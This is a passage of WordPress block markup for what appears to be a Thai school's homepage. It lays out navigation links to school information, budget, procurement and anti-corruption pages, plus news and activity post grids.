kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column 